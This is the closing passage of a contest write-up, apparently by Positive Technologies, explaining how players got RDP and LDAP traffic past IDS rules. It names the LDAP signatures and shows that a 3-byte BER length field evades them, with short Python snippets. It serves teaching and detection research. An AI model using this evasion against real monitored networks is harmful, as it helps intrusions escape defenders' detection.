Another way was demonstrated by @vos, @Abr1k0s, and @astalavista: they connected to the server using the Mocha RDP Lite mobile client. A fundamentally different solution, using netsed, was found by @webr0ck. Netsed, like regular sed, can replace network data on the fly. The player simply zeroed out all the channel names in the ClientData RDP packet.


192.168.30.60—LDAP

The description contains an IP address with port 389 open. The task provides no credentials, but the LDAP service supports anonymous connections (bind). However, with a simple three-line connection using the Python ldap3 library, we get an IDS alert.

server = ldap3.Server('192.168.30.60', port=389)

connection = ldap3.Connection(server)

connection.bind()

TEST [PTsecurity] LDAP ASN1 single byte length fields prohibited

Capturing a dump of our traffic, we see that the bind itself succeeds, but the searchRequest that the library sends afterwards goes unanswered: it is what triggers the IDS rule.

The Windows utilities ADSIEdit and ldp, as well as the Linux utility ldapsearch, give similar results, but with different alerts:

TEST [PTsecurity] LDAP ASN1 1-byte length encoded found

TEST [PTsecurity] LDAP ASN1 2-byte length encoded found

TEST [PTsecurity] LDAP ASN1 4-byte length encoded found

It all comes down to how the lengths of individual fields in LDAP messages are encoded. In the byte sequence 30 8x yy yy yy, the byte x specifies the length of the length field in bytes. For example, the sequence 30 82 00 02 encodes a two-byte length field 00 02. Players were thus required to try length fields of different sizes and discover that the IDS does not trigger on a 3-byte length field. The flag is in the response, among the namingContexts fields. The task had only one intended solution, and only two players managed to solve it.
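The long-form BER length encoding at the heart of the task can be sketched as follows; the rules above covered the 1-, 2-, and 4-byte forms, leaving the 3-byte form open:

```python
def ber_length(value: int, num_bytes: int) -> bytes:
    # Long-form BER length: first 0x80 | number-of-length-bytes,
    # then the length itself in big-endian
    return bytes([0x80 | num_bytes]) + value.to_bytes(num_bytes, "big")

assert ber_length(2, 2) == b"\x82\x00\x02"      # the 30 82 00 02 example above
assert ber_length(2, 3) == b"\x83\x00\x00\x02"  # 3-byte form: no rule matched it
```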



Results:

1st place: @vos, Apple Watch Series 6 + backpack

2nd place: @psih1337, cash reward + backpack

3rd place: @Abr1k0s, backpack


Author: Kirill Shipulin, Positive Technologies

